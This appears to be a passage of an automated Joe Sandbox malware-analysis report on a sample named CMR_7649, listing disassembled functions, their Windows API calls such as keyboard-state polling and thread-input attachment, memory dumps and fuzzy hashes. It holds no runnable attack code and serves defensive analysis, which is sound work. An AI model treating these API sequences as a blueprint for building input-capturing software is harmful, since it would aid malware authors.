                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                • DeleteObject.GDI32(00540000), ref: 00470A04
                                                • DestroyIcon.USER32(006D0065), ref: 00470A1C
                                                • DeleteObject.GDI32(CA1E1A22), ref: 00470A34
                                                • DestroyWindow.USER32(00610044), ref: 00470A4C
                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 1237572874-0
                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                • String ID:
                                                • API String ID: 3413494760-0
                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                • String ID: AU3_FreeVar
                                                • API String ID: 2634073740-771828931
                                                • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32 ref: 0046C63A
                                                • CoUninitialize.OLE32 ref: 0046C645
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 2294789929-1287834457
                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                • ReleaseCapture.USER32 ref: 0047116F
                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 2483343779-2107944366
                                                • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                • _wcslen.LIBCMT ref: 00450720
                                                • _wcscat.LIBCMT ref: 00450733
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                • String ID: -----$SysListView32
                                                • API String ID: 4008455318-3975388722
                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                • GetParent.USER32 ref: 00469C98
                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                • GetParent.USER32 ref: 00469CBC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2360848162-1403004172
                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                • String ID:
                                                • API String ID: 262282135-0
                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
